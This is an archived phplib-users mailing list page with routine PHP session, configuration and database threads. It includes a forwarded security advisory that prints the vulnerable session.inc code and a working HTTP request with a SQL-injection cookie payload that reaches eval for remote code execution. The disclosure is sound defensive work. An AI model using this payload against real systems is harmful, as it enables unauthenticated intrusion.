phplib-users Mailing List for PHPLIB (Page 4)

SourceForge Headquarters 225 Broadway Suite 1600 San Diego, CA 92101 +1 (858) 422-6466

Are there any plans to release an update that supports:
	register_long_arrays = Off
This is the default setting on my php5 host.




Content-Description: Forwarded message - Re: [phplib-users] Session url() 
method
> Date: Sat, 16 Dec 2006 14:39:21 -0600
> From: Layne Weathers <la...@dr...>
> To: php...@li...
> Subject: Re: [phplib-users] Session url() method
> 
> Lindsay Haisley wrote:
> >Formerly if one were to set $sess->mode to "get", the url()
> >method could be used to append the SID to both relative and
> >absolute URIs.  This is no longer possible for absolute URIs,
> >and I had to patch session4.inc with code from the older
> >session.inc to restore this functionality.
> 
> If you would send the patch, I or one of the other core can look at
> it and commit this change to CVS.
> 
> -- 
> 
> Layne Weathers

Layne, et al,

Here's pseudo-code for this job.  Would you all please take a look at this and 
see if you see any logical problems with the method?


if (URL is relative and session.use_trans_id is set)
	return URL
elseif ((URL is relative and session.use_trans_id is NOT set) or (URL is absolute))
	if (mode is "get" or ((fallback_mode is "get") and (HTTP_COOKIE_VARS[session_name] is empty)))
		clean URL of (possibly bogus) session data and append current session data as GET
	if (mode is "cookie")
		return URL


This assumes that session.use_trans_id can be tested even on early (<4.1.2) 
versions of PHP or that support for such early versions isn't needed.  It also 
assumes that the typo/bug I reported re. session.use_only_cookies in 
session4.inc is fixed.

-- 
Lindsay Haisley       | "Fighting against human |     PGP public key
FMP Computer Services |    creativity is like   |      available at
512-259-1190          |    trying to eradicate  | <http://pubkeys.fmp.com>
http://www.fmp.com    |        dandelions"      |
                      |      (Pamela Jones)     |



In the process of trying to get my head around rewriting the session4 url 
method, I came on the following typo in session4.inc.  Perhaps this has already 
been fixed in CVS.

--- session4.inc	2005-12-06 18:55:50.000000000 -0600
+++ session4.inc.fixed	2006-12-19 14:31:22.000000000 -0600
@@ -162,7 +162,7 @@
      
     if ( $this->mode=="cookie"
         && $this->fallback_mode=="cookie")  {     
-      ini_set ("session.use_only_cookie","1");     
+      ini_set ("session.use_only_cookies","1");     
     }                                    
     
     $this->set_tokenname(); 


The correct name for the php.ini variable is "session.use_only_cookies" (w. the 
English plural 'cookies').

-- 
Lindsay Haisley       | "Fighting against human |     PGP public key
FMP Computer Services |    creativity is like   |      available at
512-259-1190          |    trying to eradicate  | <http://pubkeys.fmp.com>
http://www.fmp.com    |        dandelions"      |
                      |      (Pamela Jones)     |



Thus spake Layne Weathers on Sat, Dec 16, 2006 at 02:39:21PM CST
> Lindsay Haisley wrote:
> >Formerly if one were to set $sess->mode to "get", the url()
> >method could be used to append the SID to both relative and
> >absolute URIs.  This is no longer possible for absolute URIs,
> >and I had to patch session4.inc with code from the older
> >session.inc to restore this functionality.
> 
> If you would send the patch, I or one of the other core can look at
> it and commit this change to CVS.

I'll take a look at it some more.  I hacked what I needed into session4.inc and 
it works for my purposes but I need to make sure any patch I send is solid.  
Basically, for a first approximation, I simply inserted a bit of code from 
session.inc.


--- /usr/share/phplib/session4.inc	2005-12-06 18:55:50.000000000 -0600
+++ session4.inc	2006-12-15 12:22:38.000000000 -0600
@@ -389,6 +389,15 @@
       $url .= ( strpos($url, "?") != false ?  "&" : "?" ) . urlencode($this->name) . "=" . $this->id;
     }
 
+    switch ($this->mode) {
+      case "get":
+        $url .= ( strpos($url, "?") != false ?  "&" : "?" ).
+                urlencode($this->name)."=".$this->id;
+      break;
+      default:
+        ;
+      break;
+    }
     // Encode naughty characters in the URL
     $url = str_replace(array("<", ">", " ", "\"", "'"), 
                        array("%3C", "%3E", "+", "%22", "%27"), $url);


There are issues in the application I'm using this in with the SID getting set 
twice (in duplicate) in the URL, so I have to find out if that's my cart 
implementation, or my patch, or what.  The duplication doesn't harm things 
functionally, but it's messy and I don't want to submit a patch that doesn't do 
the Right Thing, and cleanly :-)

-- 
Lindsay Haisley       | "Fighting against human |     PGP public key
FMP Computer Services |    creativity is like   |      available at
512-259-1190          |    trying to eradicate  | <http://pubkeys.fmp.com>
http://www.fmp.com    |        dandelions"      |
                      |      (Pamela Jones)     |



Lindsay Haisley wrote:
>Formerly if one were to set $sess->mode to "get", the url()
>method could be used to append the SID to both relative and
>absolute URIs.  This is no longer possible for absolute URIs,
>and I had to patch session4.inc with code from the older
>session.inc to restore this functionality.

If you would send the patch, I or one of the other core can look at
it and commit this change to CVS.

--=20

Layne Weathers



I note that the session4.inc module in phplib defers to PHP4's native session 
management and URL rewriting in the url() method.  There's one shortcoming of 
this implementation.  As the PHP documentation states, if session.use_trans_sid 
is set,  "_relative_ URIs will be changed to contain the session id 
automatically." (emphasis mine)

Formerly if one were to set $sess->mode to "get", the url() method could be 
used to append the SID to both relative and absolute URIs.  This is no longer 
possible for absolute URIs, and I had to patch session4.inc with code from the 
older session.inc to restore this functionality.

This comes up very specifically in an e-commerce situation where it's necessary 
to link to a secure page on the same server to collect customer info.  For 
instance, a shopping catalog page may be at http://www.vendor.com/catalog.php, 
but the checkout page may be at https://secure.webhost.com/vendor/checkout.php.  
If a session cookie is set in the catalog page, the secure checkout page falls 
outside the cookie domain and so session continuity is lost.  The logical 
solution here is to put the session name and SID into the URL as GET data.

It's probably possible to use a call to setcookie() to work around this, but 
the behavior expected in previous versions of the url() session method is no 
longer supported.

-- 
Lindsay Haisley       | "Fighting against human |     PGP public key
FMP Computer Services |    creativity is like   |      available at
512-259-1190          |    trying to eradicate  | <http://pubkeys.fmp.com>
http://www.fmp.com    |        dandelions"      |
                      |      (Pamela Jones)     |



> Not that I know of. I use a very small include file to get the path
> and make a real copy of that in each project. After that the other
> files can be symlinks.
I see, thanks for the hint!
I'll try to set something like that up.
Marko



>Is there a way to get the true symbolic link as path using PHP
>functions?

Not that I know of. I use a very small include file to get the path
and make a real copy of that in each project. After that the other
files can be symlinks.

--=20

Layne Weathers



sorry, typo, I meant "realpath" instead of "dirname" in my previous post:
so that it looks like this:

	dirname(realpath(__FILE__)) 

to get the absolute path on my server. But I get the symlink already 
resolved.



Hi,

anybody met the problem before to get the path without the symbolic link 
resolved. I use dirname(__FILE__) to get the absolute path on my server, 
but unfortunately the dirname already resolves symbolic links. This makes 
things trickyer.

Is there a way to get the true symbolic link as path using PHP functions?

Marko



Hi Layne,

> The config file is symlinked to the includes directory and it is
> prepended from there before local.inc.
but how does every single instance decide which config directory to use?
There should be a parameter given to the application somehow. Do you use a 
GET-Parameter in the entry-URL?

Marko



> switch ($_SERVER['HTTP_HOST']) {
>         include_once($_SERVER['DOCUMENT_ROOT'] . 

well, this is an idea!

Perhaps I could simply create several symbolic links to the real 
application source in the document root directory and direct the browsers 
to the wanted symbolic link. Then I could search in 
$_SERVER['DOCUMENT_ROOT'] and find out which local.inc I should use.

Sounds good!

Thanks for this idea!


Regards,
Marko



Marko,

I use config files for each separate instance of the app. The config
file defines several constants that are then used throughout the
app. The directory structure looks like:

base/
    docs/
    includes/
    setup/
        configs/
            instance_1/
            instance_2/
    templates/


The database part of the config file looks like:

define("_DATABASE", "database_name");
define("_DB_HOST", "localhost");
define("_DB_USER", "username");
define("_DB_PASS", "password");


The config file is symlinked to the includes directory and it is
prepended from there before local.inc.

--=20

Layne Weathers



Marko Kaening wrote:
> Hi folks,
>
> pretty quiet on this list. :) But perhaps it is simply because phplib 
> simply works.
>
> I met with my application a new requirement recently. I essentially want 
> to run the same application with different local.inc's. This makes sure 
> that every instance has its own session handling and user management, so 
> that both instances do not see and touch each other's databases.
>
> Up to now I simply duplicate the whole app directory, modify the local.inc 
> and point the browser to that source directory.
>
> Anybody knows a cleverer way to implement this without the need to copy 
> the whole source directory each time I set up a new instance? I thought 
> about am additional cookie (or get parameter as fall-back) or so, which 
> does the selection of the corresponding database-set specifiable in 
> various local.inc's... But I have no idea how to implement that 
> properly...
>
> Any hint for me from the community?
>
> Marko

How do you determine which local goes with which instance? I do 
something like this for testing:

In index.php:

switch ($_SERVER['HTTP_HOST']) {
    case 'www.example.org':
    case 'example.org':
    default:
        include_once($_SERVER['DOCUMENT_ROOT'] . 
'/example/etc/example.php');
        $protocol = 'https://';
        break;
    case 'dev.example.org':
        include_once($_SERVER['DOCUMENT_ROOT'] . 
'/example/etc/example_test.php');
        $protocol = 'http://';
        break;
}

Then, in example.php (or where ever, really) you can set different DB 
credentials for session repository, cookies, etc.

Not sure if this helps you. It's obviously predicated on different entry 
URLs. But I imagine you could do something with pseudo-random hashes 
each access...

/patrick




Hi folks,

pretty quiet on this list. :) But perhaps it is simply because phplib 
simply works.

I met with my application a new requirement recently. I essentially want 
to run the same application with different local.inc's. This makes sure 
that every instance has its own session handling and user management, so 
that both instances do not see and touch each other's databases.

Up to now I simply duplicate the whole app directory, modify the local.inc 
and point the browser to that source directory.

Anybody knows a cleverer way to implement this without the need to copy 
the whole source directory each time I set up a new instance? I thought 
about am additional cookie (or get parameter as fall-back) or so, which 
does the selection of the corresponding database-set specifiable in 
various local.inc's... But I have no idea how to implement that 
properly...

Any hint for me from the community?

Marko



Before I re-invent the wheel, I thought I would ask if anyone has
written a version of perm that supports more than 31 levels of
permissions.  The existing system works okay but, I need to have at
least 7 levels of user access with mostly inclusive permissions, for
which I think I would require ~127 levels.

Anyone?

Andrew Crawford



At 6:45 AM +1000 3/6/06, Richard Archer wrote:

>testing new mailman!

Sorry folks, that message was supposed to be caught and discarded!

 ...Richard.



testing new mailman!



Greetings,

James at GulfTech Security Research has kindly allowed me to
post a draft of his upcoming security advisory to this list
before he releases it to the general community. This will give
PHPLIB users some time to upgrade before any potential exploit
becomes available.

I believe this only effects session.inc, not session4.inc.
So if you are using PHPLIB with php4 sessions, this particular
problem shouldn't be an issue for you.

The solution to this vulnerability is to upgrade to 7.4a
which is available from our Sourceforge download page:
http://sourceforge.net/project/showfiles.php?group_id=31885

Or if you prefer, manually apply a patch to php/session.inc:
http://cvs.sourceforge.net/viewcvs.py/phplib/php-lib-stable/php/session.inc?r1=1.19&r2=1.20

My thanks to James at GulfTech Security Research for alerting
us to this problem and allowing time to release a solution
before releasing the advisory.

 ...Richard.


---begin forwarded text

GulfTech Security Research Advisory

Remote Code Execution:
There are some serious security issues in phplib's session
handling that may allow an attacker to perform a range of
attacks such as SQL Injection, and/or Remote Code Execution.

## Propagate the session id according to mode and lifetime.
## Will create a new id if necessary. To take over abandoned sessions,
## one may provide the new session id as a parameter (not recommended).

function get_id($id = "") {
global $HTTP_COOKIE_VARS, $HTTP_GET_VARS, $HTTP_POST_VARS,
$HTTP_SERVER_VARS;
$this->newid=true;

$this->name = $this->cookiename==""?$this->classname:$this->cookiename;

if ( "" == $id ) {
   $this->newid=false;
   switch ($this->mode) {
     case "get":
       $id = isset($HTTP_GET_VARS[$this->name]) ?
             $HTTP_GET_VARS[$this->name] :
             ( isset($HTTP_POST_VARS[$this->name]) ?
             $HTTP_POST_VARS[$this->name] :
             "") ;
     break;
     case "cookie":
       $id = isset($HTTP_COOKIE_VARS[$this->name]) ?
             $HTTP_COOKIE_VARS[$this->name] : "";
     break;
     default:
       die("This has not been coded yet.");
     break;
   }
}

### do not accept user provided ids for creation
if($id != "" && $this->block_alien_sid) {   # somehow an id was provided
by the user
    if($this->that->ac_get_value($id, $this->name) == "") {
       # no - the id doesn't exist in the database: Ignore it!
       $id = "";
    }
}

The above code is from sessions.inc @ lines 85-121. The variable
$id gets it's values from either GET or COOKIE and is never made
safe before being passed to the function ac_get_value() which uses
the variable in a query, thus allowing for SQL Injection. However,
it is possible to manipulate the query in a way that php code is
returned and passed to a vulnerable eval call.

GET /phplib/pages/index.php3 HTTP/1.1
Host: example.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1)
Gecko/20060111 Firefox/1.5.0.1
Accept:
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Cookie: Example_Session=' UNION SELECT 'cGhwaW5mbygpOw=='/*
If-Modified-Since: Sat, 18 Feb 2006 18:24:34 GMT

For example, the above request made to the index.php3 script that
is shipped with phplib will successfully execute the phpinfo call.
This could obviously be used for more sinister purposes such as
running arbitrary system commands and the like. Also, since user
authentication is not necessary to exploit this vulnerability, the
risk of being exploited is much higher.

---end forwarded text




on 01/26/2006 08:09 PM Mike Green said the following:
> Do any of you know of any Content Management Systems (CMSs) that use the 
> PHPLib template library -- or any similar template system?
> 

A couple:

http://www.php-slash.org/
http://www.back-end.org/

Geeklog used an old version - http://www.geeklog.net/

that's a start,

Joe

p.s.  not a cms but eGroupware still uses it for some modules but is 
moving away.

> TIA!
> 
> Mike Green




SnVzdCBnb29nbGUgZm9yIHNtYXJ0eSArIGNtcywgYW5kIHlvdSB3aWxsIGZpbmQgc29tZS4NCg0K
QWxtb3N0IGFsbCBwaHAtYmFzZWQgQ01TIHVzZSBvbmUgdGVtcGxhdGUgc3lzdGVtIG9yIGFub3Ro
ZXIuDQplelB1Ymxpc2ggZm9yIGluc3RhbmNlIHVzZXMgaXRzIG93biBjdXN0b20gdGVtcGxhdGUg
bGFuZ3VhZ2UuDQoNCkFGQUlLIHRoZSBwaHBsaWIgdGVtcGxhdGUgc3lzdGVtIGlzIG5vdCBpbiBt
dWNoIHVzZSBhbnltb3JlLg0KDQpCeWUNCkdhZXRhbm8gR2l1bnRhDQogIC0tLS0tT3JpZ2luYWwg
TWVzc2FnZS0tLS0tDQogIEZyb206IHBocGxpYi11c2Vycy1hZG1pbkBsaXN0cy5zb3VyY2Vmb3Jn
ZS5uZXQgW21haWx0bzpwaHBsaWItdXNlcnMtYWRtaW5AbGlzdHMuc291cmNlZm9yZ2UubmV0XU9u
IEJlaGFsZiBPZiBNaWtlIEdyZWVuDQogIFNlbnQ6IEZyaWRheSwgSmFudWFyeSAyNywgMjAwNiAz
OjA5IEFNDQogIFRvOiBwaHBsaWItdXNlcnNAbGlzdHMuc291cmNlZm9yZ2UubmV0DQogIFN1Ympl
Y3Q6IFtQaHBsaWItdXNlcnNdIENNU3MgdGhhdCB1c2UgdGVtcGxhdGVzDQoNCg0KICBEbyBhbnkg
b2YgeW91IGtub3cgb2YgYW55IENvbnRlbnQgTWFuYWdlbWVudCBTeXN0ZW1zIChDTVNzKSB0aGF0
IHVzZSB0aGUgUEhQTGliIHRlbXBsYXRlIGxpYnJhcnkgLS0gb3IgYW55IHNpbWlsYXIgdGVtcGxh
dGUgc3lzdGVtPw0KDQogIFRJQSENCg0KICBNaWtlIEdyZWVuDQo=

Howdy,

I haven't spent a lot of time dissecting the code in DB_Sql but, my
understanding is that DB_Sql's connect() is an *internal* instance
method, not intended for use like that.  I would probably do the same
thing by declaring a separate DB_Sql extension class for each database.
 That would be something like this:

    class DB_Example extends DB_Sql {
      var $classname = "db_example";
      var $Host     = "localhost";
      var $Database = "DB1";
      var $User     = "example";
      var $Password = "password";
      var $Auto_Free = "true";
      var $Halt_On_Error = "report";
    }

    class DB_Example2 extends DB_Sql {
      var $classname = "db_example2";
      var $Host     = "localhost";
      var $Database = "DB2";
      var $User     = "example2";
      var $Password = "password2";
      var $Auto_Free = "true";
      var $Halt_On_Error = "report";
    }

Then, you could do basically the same thing this way:

    $exampledb = new DB_Example;
    $query = "SELECT name,id FROM FILE WHERE datatype='folder'";
    $exampledb->query($query);
    while($exampledb->next_record()) {
        echo $exampledb->f(0) . "[" . $exampledb->f(1) . "]<br />\n";
    }


    $exampledb2 = new DB_Example2;
    $query2 = "SELECT name,id FROM FILE WHERE datatype='folder'";
    $exampledb2->query($query2);
    while($exampledb2->next_record()) {
        echo $exampledb->f(0) . "[" . $exampledb->f(1) . "]<br />\n";
    }

    $exampledb->query($query);
    while($exampledb->next_record()) {
        echo $exampledb->f(0) . "[" . $exampledb->f(1) . "]<br />\n";
    }

This definitely works.

Andrew Crawford

Kelby Zorgdrager wrote:
> Folks:
> 
> Gotta question for you. I am experiencing a unexpected problem when 
> using the DB_Sql class. It appears that if I create a DB_Sql object  to
> one database (and perform a query) then create a second DB_Sql  object
> to another database (and perform a query), when I return to  the first
> object, it's connection state is invalid. Due to the  architecture of
> our app, I can not consolidate the two objects into  one (that would be
> reused).
> 
> I have attached a sample as an example to show the problem.
> 
> Assume for the example there are:
> --> two databases, DB1 and DB2
> --> a table in each db (DB1.FILE and DB2.USER)
> 
> I have attached two SQL files for the tables along with the example. 
> Any insight into why I am seeing this would be greatly appreciated.
> 
> Thanks.
> 
> KZ
> 
> 
> ------------------------------------------------------------------------
> 
> <?php
>   include_once ("db_mysql.inc");
> 
>   $dbConnection = new DB_Sql;
>   $dbConnection->Database = $dbName;
>   if (!$dbConnection->connect("DB1")) {
>       $error = "Failed to connect to $dbName";
>       echo "Failed to initialize: $error<br>";
>       exit;
>   }
> 
>   $dbConnection->query("SELECT name,id FROM FILE WHERE datatype='folder'");
>   while($dbConnection->next_record()) {
>     echo "<BR>".$dbConnection->f(0)."[".$dbConnection->f(1)."]";
>   }
> 
>   $dbConnection2 = new DB_Sql;
>   $dbConnection2->connect("DB2");
>   $dbConnection->query("SELECT name,id FROM USER");
>   while($dbConnection->next_record()) {
>     echo "<BR>".$dbConnection->f(0)."[".$dbConnection->f(1)."]";
>   }
> 
>   /*
>   * when this is queried, it returns nothing.. even though it should
>   * return the same 'set' as the first time it was queried above.
>   */
>   $dbConnection->query("SELECT name,id FROM FILE WHERE datatype='folder'");
>   while($dbConnection->next_record()) {
>     echo "<BR>".$dbConnection->f(0)."[".$dbConnection->f(1)."]";
>   }
> ?>



Folks:

Gotta question for you. I am experiencing a unexpected problem when  
using the DB_Sql class. It appears that if I create a DB_Sql object  
to one database (and perform a query) then create a second DB_Sql  
object to another database (and perform a query), when I return to  
the first object, it's connection state is invalid. Due to the  
architecture of our app, I can not consolidate the two objects into  
one (that would be reused).

I have attached a sample as an example to show the problem.

Assume for the example there are:
--> two databases, DB1 and DB2
--> a table in each db (DB1.FILE and DB2.USER)

I have attached two SQL files for the tables along with the example.  
Any insight into why I am seeing this would be greatly appreciated.

Thanks.

KZ


> Andreas,
> 
> Session::url() only cleans out any session ids from the URL given to it
> before adding the session id to the query string of that URL.
> 
> Based on the fact that Session::url() only adds the session id if the
> session is in GET mode, I'd guess that your code is adding the get vars
> on top of the existing $_SERVER["REQUEST_URI"]. It's pretty simple to
> remove those; you could use Session::url() as a guide for making a
> generic function to handle that task.
> 

Thanks a lot Layne, I'll try it. 



> I use it in a navigationbar, so if I click on one item and than on
> the next item the url ever "knows" where I was before. It's ok, but I
> don't like it, it looks so ugly. I thought there was something that
> looks into the querystring and than deletes doubles and gives the
> cleaned querystring back, but maybe I am wrong. There will come a day
> for urlbeauty. :)


Andreas,

Session::url() only cleans out any session ids from the URL given to it
before adding the session id to the query string of that URL.

Based on the fact that Session::url() only adds the session id if the
session is in GET mode, I'd guess that your code is adding the get vars
on top of the existing $_SERVER["REQUEST_URI"]. It's pretty simple to
remove those; you could use Session::url() as a guide for making a
generic function to handle that task.

--=20

Layne Weathers




2001	Jan	Feb	Mar	Apr	May	Jun	Jul	Aug (106)	Sep (99)	Oct (44)	Nov (97)	Dec (60)
2002	Jan (56)	Feb (81)	Mar (134)	Apr (69)	May (106)	Jun (122)	Jul (98)	Aug (52)	Sep (184)	Oct (219)	Nov (102)	Dec (106)
2003	Jan (88)	Feb (37)	Mar (46)	Apr (51)	May (30)	Jun (17)	Jul (45)	Aug (19)	Sep (5)	Oct (4)	Nov (12)	Dec (7)
2004	Jan (11)	Feb (7)	Mar	Apr (15)	May (17)	Jun (13)	Jul (5)	Aug	Sep (8)	Oct (6)	Nov (21)	Dec (13)
2005	Jan (4)	Feb (3)	Mar (7)	Apr (7)	May	Jun (11)	Jul (7)	Aug	Sep	Oct	Nov (7)	Dec
2006	Jan (3)	Feb	Mar (1)	Apr	May	Jun (2)	Jul (1)	Aug	Sep	Oct (9)	Nov	Dec (5)
2007	Jan (15)	Feb (2)	Mar	Apr	May	Jun	Jul (9)	Aug	Sep (2)	Oct	Nov	Dec
2008	Jan	Feb	Mar	Apr (12)	May	Jun (3)	Jul (1)	Aug (19)	Sep (2)	Oct	Nov	Dec (6)
2009	Jan (1)	Feb	Mar	Apr	May	Jun	Jul	Aug	Sep	Oct	Nov	Dec (6)

phplib-users Mailing List for PHPLIB (Page 4)

phplib-users — A list for users of phplib to talk / discuss phplib